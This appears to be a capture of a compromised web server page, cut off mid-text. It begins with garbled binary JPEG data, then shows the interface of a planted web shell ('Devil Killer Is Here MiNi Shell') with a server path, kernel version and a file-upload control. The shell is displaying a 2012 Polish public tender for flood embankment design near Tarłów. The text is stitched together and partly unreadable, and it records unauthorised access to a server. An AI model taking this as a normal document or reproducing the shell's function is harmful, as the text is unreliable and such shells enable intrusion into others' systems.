JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120620/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20120620/134761-N-2012.html

<p class="kh_header"><b>Kielce: wykonanie projektów podziału nieruchomości oraz aktualizacji dokumentacji projektowej wraz ze złożeniem wniosku o wydanie decyzji 
o pozwoleniu na realizację inwestycji dla zadania pn.  Rozbudowa lewego wału rzeki Wisły zad. Dorotka  - Leśne Chałupy 
w km 2+550 - 3+460, 3+600 - 5+000, gm. Tarłów, woj. świętokrzyskie</b><br>
<b>Numer ogłoszenia: 134761 - 2012; data zamieszczenia: 20.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Świętokrzyski Zarząd Melioracji i Urządzeń Wodnych w Kielcach , ul. Witosa 86, 25-561 Kielce, woj. świętokrzyskie, tel. 041 3340105 wew. 209, 309, faks 041 3340105 wew. 409.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szmiuw.kielce.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: wojewódzka samorządowa jednostka organizacyjna nie posiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> wykonanie projektów podziału nieruchomości oraz aktualizacji dokumentacji projektowej wraz ze złożeniem wniosku o wydanie decyzji 
o pozwoleniu na realizację inwestycji dla zadania pn.  Rozbudowa lewego wału rzeki Wisły zad. Dorotka  - Leśne Chałupy 
w km 2+550 - 3+460, 3+600 - 5+000, gm. Tarłów, woj. świętokrzyskie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest wykonanie projektów podziału nieruchomości gruntowych oraz aktualizacja dokumentacji projektowej wraz ze złożeniem wniosku o wydanie decyzji 
o pozwoleniu na realizację inwestycji dla zadania pn.: Rozbudowa lewego wału rzeki Wisły zad. Dorotka - Leśne Chałupy w km 2+550 - 3+460, 3+600 - 5+000, gm. Tarłów, woj. świętokrzyskie. 

W związku z wprowadzeniem Ustawy z dnia 8 lipca 2010 r. o szczególnych zasadach przygotowania do realizacji inwestycji w zakresie budowli przeciwpowodziowych (Dz. U. nr 143 z dnia 10 sierpnia 2010r., poz. 963) zaszła konieczność wykonania projektów podziałów działek oraz dostosowania posiadanej dokumentacji do wymogów przedmiotowej ustawy.

Zaktualizowana dokumentacja projektowa będzie służyć do opisu przedmiotu zamówienia do przetargu w oparciu o ustawę Prawo zamówień publicznych na roboty budowlane oraz realizację pełnego zakresu robót budowlanych na jej podstawie;

1.1.	Wielkość oraz zakres przedmiotu zamówienia.

1.1.1.	wykonanie pełnego zakresu prac geodezyjnych związanych z: wykonaniem projektów  podziału 164 nieruchomości (wykaz działek w załączniku nr 9 do SIWZ) położonych na terenie gminy Tarłów, jako dokumentów niezbędnych do złożenia wniosku o wydanie decyzji o pozwoleniu na realizację inwestycji na podstawie Ustawy z dnia 8 lipca 2010 r. o szczególnych zasadach przygotowania do realizacji inwestycji w zakresie budowli przeciwpowodziowych oraz trwałym zastabilizowaniem działek w terenie (słupkami betonowymi). Operat podziałowy należy opracować w oparciu o oględziny i pomiary nieruchomości, aktualne mapy ewidencyjne, wypisy z rejestru gruntów i ksiąg wieczystych. Ponadto należy sporządzić i doprowadzić do zgodności treść mapy ewidencji gruntów z aktualnym stanem prawnym.


Dokumentacja geodezyjna w szczególności ma zawierać:

1)	wykaz wywłaszczeniowy, 
2)	aktualne wypisy z ksiąg wieczystych lub inne dokumenty potwierdzające prawo własności nieruchomości (Lwh, AWZ), 
3)	aktualne pełne wypisy z ewidencji gruntów,
4)	synchronizację dla poszczególnych działek w przypadku wystąpienia różnic pomiędzy księgą wieczystą, a ewidencją gruntów,
5)	wykaz współrzędnych nowych punktów granicznych działek wraz z ich zastabilizowaniem  w terenie słupkami betonowymi,
6)	zbiorczą mapę z projektami podziałów nieruchomości (wersja papierowa 6 egz. + wersja elektroniczna 1 egz. na nośniku DVD, pliki z rozszerzeniem pdf i dwg lub inne umożliwiające edycję),

Projekty podziału nieruchomości winny spełniać wymagania art. 6 ust. 1 pkt. 4 ustawy  
z dnia 8 lipca 2010r. o szczególnych zasadach przygotowania do realizacji inwestycji                          w zakresie budowli przeciwpowodziowych (Dz. U. nr 143 z dnia 10 sierpnia 2010r., poz. 963) - i powinny zostać sporządzone zgodnie z odrębnymi przepisami, a mianowicie zgodnie z ustawą z dnia 21 sierpnia 1997r. o gospodarce nieruchomościami (tj. 2010r., Dz.U. nr 102, poz. 651z póź. zm.) a w szczególności zgodnie z rozporządzeniem Rady Ministrów z dnia 07 grudnia 2004r. w sprawie sposobu i trybu dokonywania podziałów nieruchomości (2004, Dz.U. nr 268, poz. 2663); tj. powinny zawierać między innymi wykaz zmian gruntowych oraz protokoły z przejęcia granic nieruchomości.


1.1.2.	skompletowanie dokumentów dla 35 działek, które będą podczas rozbudowy wału zajmowane w całości bądź stanowią własność ŚZMiUW w Kielcach 
i nie będą dzielone (wykaz działek stanowi załącznik nr 10 do SIWZ), jako dokumentów niezbędnych do złożenia wniosku o wydanie decyzji o pozwoleniu na realizację inwestycji na podstawie Ustawy z dnia 8 lipca 2010 r. o szczególnych zasadach przygotowania do realizacji inwestycji w zakresie budowli przeciwpowodziowych. 

Dla całych działek zajmowanych pod wał należy dostarczyć:

a)	aktualne wypisy i wyrysy w ilości 6 egzemplarzy z klauzulą do celów prawnych z naniesionym wałem,
b)	aktualny odpis z księgi wieczystej lub inne dokumenty potwierdzające prawo własności nieruchomości (Lwh, AWZ).

W ramach zakresu, o którym mowa odpowiednio w pkt. 1.1.1 oraz 1.1.2 wykonany zostanie:

-	wykaz działek w całości wchodzących pod wał oraz wykaz działek dzielonych;
-	wykaz działek o ograniczonych prawach rzeczowych (użytkowanie, służebność, zastaw, hipoteka) oraz działek objętych umowami najmu, dzierżawy lub użyczeniem.



1.1.3.	aktualizacja opracowanej w 2009 r. dokumentacji projektowej pn.: Rozbudowa lewego wału rzeki Wisły zad. Dorotka - Leśne Chałupy w km 2+550 - 3+460, 3+600 - 5+000, gm. Tarłów, woj. świętokrzyskie.

A.	W ramach aktualizacji dokumentacji należy wykonać/uzyskać m.in.:

­- aktualizację operatu wodnoprawnego zgodnie z Ustawą z dnia 18 lipca 2001 r. Prawo wodne (Dz. U. Nr 115 z 2001 r. poz. 1229  z późn. zm.) wraz ze złożeniem wniosku 
o wydanie pozwolenia wodnoprawnego i uzyskaniem przedmiotowego pozwolenia; (Świętokrzyski Zarząd Melioracji i Urządzeń Wodnych w Kielcach posiada wydaną przez Wójta Gminy Tarłów znak: RRB.7331.1.2012 z dnia 03.04.2012 r. decyzję o środowiskowych uwarunkowaniach dla przedmiotowego zadania.) 

- charakterystykę inwestycji określającą rodzaj budowli przeciwpowodziowej oraz jej lokalizację i parametry techniczne;

­- mapę w skali co najmniej 1 : 10 000, przedstawiającą projektowany obszar inwestycji 
z zaznaczeniem podziału geodezyjnego nieruchomości oraz terenu niezbędnego dla obiektów budowlanych, oraz istniejące uzbrojenie terenu, a także wskazanie części nieruchomości będących częścią inwestycji, na której nie będą prowadzone roboty budowlane;

­-analizę powiązania inwestycji z mapami zagrożenia powodziowego, mapami ryzyka powodziowego, z planami zarządzania ryzykiem powodziowym, o ile zostały opracowane. 
- 6 egzemplarzy map zawierających projekty podziału nieruchomości, sporządzone zgodnie z odrębnymi przepisami wraz z wykazem zmian gruntowych,

­- określenie zmian w dotychczasowej infrastrukturze zagospodarowania terenu;



­- aktualizację projektu budowlanego (wersja papierowa 6 egz. + wersja elektroniczna                       2 egz. na nośniku DVD, załączniki mapowe - pliki z rozszerzeniem pdf lub inne umożliwiające edycję) w zakresie uwzględniającym specyfikę robót budowlanych (ewentualnie dostosowanie istniejących rozwiązań projektowych do obecnie obowiązujących przepisów), zgodnie z wymogami art. 34 ustawy z dnia 7 lipca 1994 r. Prawo budowlane (t. j. Dz. U. z 2010 r. Nr 243, poz. 1623) oraz z Rozporządzeniem Ministra Infrastruktury z dnia 3 lipca 2003 r. w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz. U. Nr 120 poz. 1133) oraz z zapisami:

- Rozporządzenia Ministra Środowiska z dnia 20 kwietnia 2007 r. w sprawie warunków technicznych, jakim powinny odpowiadać budowle hydrotechniczne i ich usytuowanie (Dz. U. Nr 86  z 2007r. poz.579);      
- Ustawy z dnia 3 października 2008 r. o udostępnianiu informacji o środowisku                      i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko (Dz. U. Nr 199, poz. 1227 z 2008 r. z późn. zm.);

- Ustawy z dnia 18 lipca 2001 r. Prawo wodne ((Dz. U. z 2010 r. nr 193 poz. 1287 z późn. zmianami ). );
- Rozporządzenia Rady Ministrów z dnia 09.11.2004 r. w sprawie określenia rodzajów przedsięwzięć mogących znacząco oddziaływać na środowisko oraz szczegółowych uwarunkowań związanych z kwalifikowaniem przedsięwzięcia do sporządzania raportu  o oddziaływaniu na środowisko (Dz. U. Nr 257 poz. 2573);
- Ustawy z dnia 27.03.2003 r. o planowaniu i zagospodarowaniu przestrzennym 
(Dz. U. Nr 80 z 2003 r. poz. 717 z późn. zm.);
- Ustawy z dnia 08.07.2010 r. o szczególnych zasadach przygotowania do realizacji inwestycji w zakresie budowli przeciwpowodziowych (Dz. U. Nr  143 poz. 963);
- Ustawą z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (t.j. Dz. U. Nr 113 poz. 759 z późn. zm.);
oraz przepisami wykonawczymi do tych ustaw i obowiązującymi w dacie przekazania opracowania przepisami, obowiązującymi Polskimi Normami pozwalającymi na uzyskanie pełnych uzgodnień projektu i pozwolenia na realizację inwestycji. 
W przypadku zmian w przepisach, pociągających za sobą potrzebę uzyskania nowych decyzji bądź uzgodnień, Wykonawca ma obowiązek ich pozyskania. Dokumentacja projektowa powinna uwzględniać wszystkie obowiązki na dzień przekazania jej Zamawiającemu. 

W ramach aktualizacji projektu budowlanego wykonawca ma obowiązek dołączyć: zaświadczenie, o którym mowa w art. 12 ust. 7 ustawy z dnia 7 lipca 1994r. - Prawo budowlane (Dz. U. z 2006r. Nr 156, poz. 1118, z późn. zm.), aktualnym na dzień aktualizacji dokumentacji.

Ponadto projekt zagospodarowania terenu  - mapa projektowych rozwiązań technicznych (będąca częścią projektu budowlanego) powinna spełniać wymogi rozporządzenia Ministra Infrastruktury w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz. U. 2003  Nr 120,  poz.1133) oraz z art. 34 ust. 3 Prawa budowlanego, W/w mapa powinna być opracowana na kopii aktualnej mapy zasadniczej lub mapy jednostkowej, przyjętej do właściwego zasobu geodezyjnego i kartograficznego - z pieczęciami dot. przyjęcia mapy do właściwego zasobu geodezyjnego  w związku z § 8 ust. 1 Rozporządzenia Ministra Infrastruktury w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz. U. 2003  Nr 120,  poz.1133), zawierającego m.in.: granice obszaru aktualizacji mapy do celów projektowych, obejmujące również obszar otaczający teren inwestycji w pasie co najmniej 30 m - stosownie do zapisu § 5 rozporządzenia Ministra Gospodarki Przestrzennej i Budownictwa z dnia 21 lutego 1995r. (Dz. U. Nr 25, poz. 133) w sprawie rodzaju i zakresu opracowań geodezyjno - kartograficznych oraz czynności geodezyjnych obowiązujących w budownictwie, zawierającej linie rozgraniczające teren inwestycji (na zajęcie stałe i czasowe) oraz obszar oddziaływania inwestycji, itp.

­- uzyskanie wymaganych opinii zgodnie z art. 6, ust. 1, pkt 7 ustawy z dnia 8 lipca 2010 r. 
o szczególnych zasadach przygotowania do realizacji inwestycji w zakresie budowli przeciwpowodziowych;

­- wskazanie nieruchomości w stosunku do których decyzja o pozwoleniu na realizacje inwestycji ma wywołać skutek, o którym mowa w art. 19 ust. 4 Ustawy z dnia 8 lipca 2010 r. o szczególnych zasadach przygotowania do realizacji inwestycji w zakresie budowli przeciwpowodziowych (Dz. U.  Nr 143 poz. 963);

­- wskazanie nieruchomości, o których mowa w art. 9 pkt 5 lit. b w/w ustawy;

­- wskazanie ograniczonych praw rzeczowych obciążających nieruchomości wskazanych zgodnie z pkt 10 w/w ustawy;

­- uzgodnienie czasowego zajęcia terenu (oświadczenia) z wszystkimi użytkownikami gruntów (jeżeli będzie potrzeba czasowego zajęcia terenu);

­- aktualizację projektu wykonawczego (wersja papierowa 6 egz. + wersja elektroniczna 2 egz. na nośniku CD, załączniki mapowe - pliki z rozszerzeniem PDF i innym umożliwiającym edycję), uzupełniającego i uszczegółowiającego projekt budowlany w zakresie i stopniu dokładności niezbędnym do realizacji robót budowlanych; 1.2.	Przedmiot zamówienia należy wykonać zgodnie ze standardami oraz obowiązującymi przepisami prawa, m.in.: 

a)	Ustawą z dnia 8 lipca 2010 r. o szczególnych zasadach przygotowania do realizacji inwestycji w zakresie budowli przeciwpowodziowych (Dz. U.  Nr 143 poz. 963),
b)	Ustawą z dnia 7 lipca 1994r. - Prawo budowlane (t.j. Dz. U. z 2010r. Nr 243, poz. 1623),
c)	Ustawą z dnia 18 lipca 2001 r. Prawo wodne (Dz. U. Nr 115 z 2001 r. poz. 1229  z późn. zm.);
d)	Ustawą z dnia 17 maja 1989 r. Prawo geodezyjne i kartograficzne (Dz. U. z 2010 r. Nr 193 poz. 1287 t.j.),
e)	Ustawą z dnia 21 sierpnia 1997 r. o gospodarce nieruchomościami (Dz. U. z 2010 r. Nr 102 poz. 651 z późn. zm.),
f)	Rozporządzeniem Rady Ministrów z dnia 7 grudnia 2004 r. w sprawie sposobu                       i trybu dokonywania podziałów nieruchomości (Dz. U. Nr 268 poz. 2663);
g)	Rozporządzenia Ministra Infrastruktury z dnia 3 lipca 2003r. w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz. U. Nr 120, poz. 1133),
h)	Rozporządzenia Ministra Gospodarki Przestrzennej i Budownictwa z dnia 21 lutego 1995r. (Dz. U. Nr 25, poz. 133) w sprawie rodzaju i zakresu opracowań geodezyjno - kartograficznych oraz czynności geodezyjnych obowiązujących w budownictwie.
1.3.	Do obowiązków wykonawcy należy wykonanie pozostałych niezbędnych opracowań (w zależności od warunków stawianych przez uzgadniających) jeżeli konieczność ich wykonania jest niezbędna dla wykonania przedmiotu zamówienia. 
1.4.	Wykonawca zobowiązany jest złożyć w Wydziale Infrastruktury i Geodezji Świętokrzyskiego Urzędu Wojewódzkiego w Kielcach kompletnego wniosku o wydanie decyzji o pozwoleniu na realizację inwestycji oraz przekazać potwierdzenie złożenia przedmiotowego wniosku Zamawiającemu
1.5.	Wykonawca przekaże Zamawiającemu: podpisane przez przedstawiciela ŚZMiUW RO w Sandomierzu protokoły zastabilizowania działek w terenie słupkami betonowymi, kopię badań hipotecznych oraz wykaz współrzędnych nowych punktów granicznych. 
1.6.	Obowiązkiem Wykonawcy jest zapoznanie się z w/w dokumentacją pierwotną, a także przeprowadzenie wizji lokalnej w terenie oraz uzyskanie, na swoją odpowiedzialność i ryzyko, wszelkich istotnych informacji, które mogą być konieczne do przygotowania oferty. Wizję lokalną Wykonawca dokona na swój koszt.
1.7.	dokumentacja nie może opisywać przedmiotu zamówienia przez wskazanie znaków towarowych, patentów lub pochodzenia, chyba, że jest to uzasadnione specyfikacją przedmiotu zamówienia lub nie można tego opisać za pomocą dostatecznie dokładnych określeń;
1.8.	dokumentacja powinna opisywać przedmiot zamówienia, w tym zastosowane materiały                  i urządzenia, za pomocą cech technicznych i jakościowych, przy przestrzeganiu Polskich Norm przenoszących europejskie normy zharmonizowane. W przypadku braku Polskich Norm przenoszących europejskie normy zharmonizowane uwzględnia się: europejskie aprobaty techniczne, wspólne specyfikacje techniczne;
1.9.	w opracowanej dokumentacji będą wskazane wyroby budowlane (materiały i urządzenia) dopuszczone do obrotu i powszechnie dostępne na rynku.
1.10.	Dokumentację należy zaktualizować zgodnie z obowiązującymi przepisami, normami, ze sztuką budowlaną oraz winna być ona opatrzona klauzulą o kompletności i przydatności z punktu widzenia celu, któremu ma służyć; informacje zawarte w dokumentacji projektowej w zakresie technologii wykonania robót, doboru materiałów i urządzeń należy określić w sposób zgodny z przepisami ustawy Prawo zamówień publicznych.
1.11.	zgodnie z art. 20 ust. 2 Prawa budowlanego projektant ma obowiązek zapewnić sprawdzenie projektu architektoniczno-budowlanego pod względem zgodności z przepisami, w tym techniczno - budowlanym i obowiązującymi normami przez osoby posiadające uprawnienia budowlane do projektowania bez ograniczeń w odpowiedniej specjalności lub przez rzeczoznawcę budowlanego. 

1.12.	aktualizowana dokumentacja powinna zawierać klauzulę stwierdzającą kompletność opracowania i przydatność celowi, jakiemu ma służyć.

1.13.	Po przekazaniu Zamawiającemu zaktualizowanej dokumentacji wykonana zostanie opinia odnosząca się do zgodności wykonania w/w dokumentacji ze Specyfikacją Istotnych Warunków Zamówienia , a także z obowiązującymi przepisami, po opracowaniu której zwołane zostanie posiedzenie ZOPI. Wymóg wprowadzenia ewentualnych uzupełnień lub poprawek  do zaktualizowanej  dokumentacji zgodnie z zaleceniami Zespołu Opiniowania  Projektów Inwestycyjnych będzie traktowany jako wada dokumentacji i w takim przypadku Wykonawca będzie zobowiązany do wykonania poprawek lub wprowadzenia  uzupełnień w wyznaczonym przez Zamawiającego terminie.

2.	Zamówienie uważa się za zrealizowane z chwilą protokolarnego przekazania Zamawiającemu opracowania spełniającego wszystkie w/w wymagania, w 6 kompletach w wersji papierowej i na 2 nośnikach elektronicznych (płyta CD/DVD) wraz z potwierdzeniem złożenia w Wydziale Infrastruktury i Geodezji Świętokrzyskiego Urzędu Wojewódzkiego w Kielcach kompletnego wniosku o wydanie decyzji o pozwoleniu na realizacje inwestycji, a także podpisanych przez przedstawiciela ŚZMiUW RO w Sandomierzu protokołów zastabilizowania działek w terenie słupkami betonowymi, kopii badań hipotecznych oraz wykazu współrzędnych nowych punktów granicznych.
3.	Zamawiający zaleca, aby Wykonawca przeprowadził wizję w terenie, w celu ustalenia zakresu prac związanych z realizacją zamówienia oraz zapoznał się z opracowaną dokumentacją z 2009 r. 
4.	Materiały dostępne do wykorzystania przy opracowaniu projektów podziału i aktualizacji dokumentacji: - Rozbudowa lewego wału rzeki Wisły zad. Dorotka - Leśne Chałupy w km 2+550 - 3+460, 3+600 - 5+000, gm. Tarłów, woj. świętokrzyskie. - dokumentacja projektowa z 2009 r. opracowana przez Biuro Studiów i Projektów Gospodarki Wodnej Rolnictwa BIPROMEL Sp. z o. o., ul. Instalatorów 9, 02-237 Warszawa. 5. Termin wykonania zamówienia: do dnia  30-11-2012 r.
Termin do dnia 30-11-2012 r. obejmuje protokolarne przekazanie Zamawiającemu: -	kompletnego opracowania zawierającego wszystkie wymagane elementy (w tym wyszczególnione w niniejszej SIWZ), w 6 kompletach w wersji papierowej i na 2 nośnikach elektronicznych (płyta CD/DVD) wraz z potwierdzeniem złożenia w Wydziale Infrastruktury i Geodezji Świętokrzyskiego Urzędu Wojewódzkiego w Kielcach kompletnego wniosku o wydanie decyzji o pozwoleniu na realizacje inwestycji,
-	podpisanych przez przedstawiciela ŚZMiUW RO w Sandomierzu protokołów zastabilizowania działek w terenie słupkami betonowymi, 
-	kopii badań hipotecznych,
-	wykazu współrzędnych nowych punktów granicznych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>1. Na podstawie art. 36 ust. 2 pkt. 3 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych ( tj. 2010r., Dz.U. nr 113,poz. 759 z późn. zm. - zwanej dalej ustawą) Zamawiający informuje, że przewiduje ewentualne udzielenie zamówienia uzupełniającego na:  -	wykonanie projektów podziału działek ze stabilizacją w terenie (dla ilości działek nie większej niż 10 szt.),
-	przygotowanie kompletu dokumentów dla działek nie dzielonych, (dla ilości działek nie większej niż 10 szt.), obejmującego odpowiednio zakres, o którym mowa w pkt 1.1.1 oraz  1.1.2. Zamówienie to może zostać udzielone jeżeli wystąpi taka konieczność na mocy art. 67 ust.1 pkt 6 ustawy.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-1, 70.00.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wysokość wadium ustala się w kwocie 1 000,00 zł (słownie: jeden tysiąc zł 00/100)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.	Wykonania w ciągu ostatnich trzech lat przed upływem terminu składania ofert, 
a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej dwóch usług (o wartości brutto każdej usługi - co najmniej 50 tys. zł każda) w zakresie wykonania podziałów geodezyjnych działek. Na potwierdzenie spełnienia warunku należy złożyć poniższe dokumenty:  2. Sporządzony przez Wykonawcę wykaz prac w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i posiadania doświadczenia  we wzorze stanowiącym załącznik nr 2 do SIWZ. W wykazie tym należy potwierdzić spełnienie warunków określonych w  pkt.1. W przypadku składania oferty przez Wykonawców występujących wspólnie warunek ten może spełnić, dowolny z Wykonawców występujących wspólnie lub może być spełniony łącznie. Wymagana forma dokumentów oryginał.  3.Dokumenty potwierdzające, że prace przedstawione w wykazie  zrealizowanych zadań zostały wykonane należycie, np. referencje. Wymagana forma dokumentów oryginał lub kopia poświadczona za zgodność z oryginałem przez Wykonawcę lub upoważnionego pełnomocnika,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Wykonawca winien dysponować	co najmniej dwoma osobami, w tym: - a.	osobą na stanowisku projektanta posiadającą uprawnienia o specjalności konstrukcyjno - budowlanej i specjalizacji techniczno - budowlanej do projektowania w zakresie: obiektów budowlanych melioracji wodnych lub śródlądowych budowli hydrotechnicznych lub odpowiadające im równoważne uprawnienia wydane na podstawie wcześniejszych przepisów która jako  projektant  wykonała co najmniej dwie dokumentacje projektowe na przebudowę, rozbudowę lub budowę wałów przeciwpowodziowych (minimum klasy III) o łącznej wartości wykonanych dokumentacji co najmniej 100 tys. zł., -  b.	jedną osobą posiadającą uprawnienia zawodowe w dziedzinie geodezji i kartografii w zakresie: rozgraniczania i podziałów nieruchomości (gruntów) oraz sporządzania dokumentacji do celów prawnych, zgodnie z przepisami ustawy z dnia 17.05.1989 r. Prawo geodezyjne i kartograficzne (Dz. U. z 2010 r. nr 193 poz. 1287 z późn. 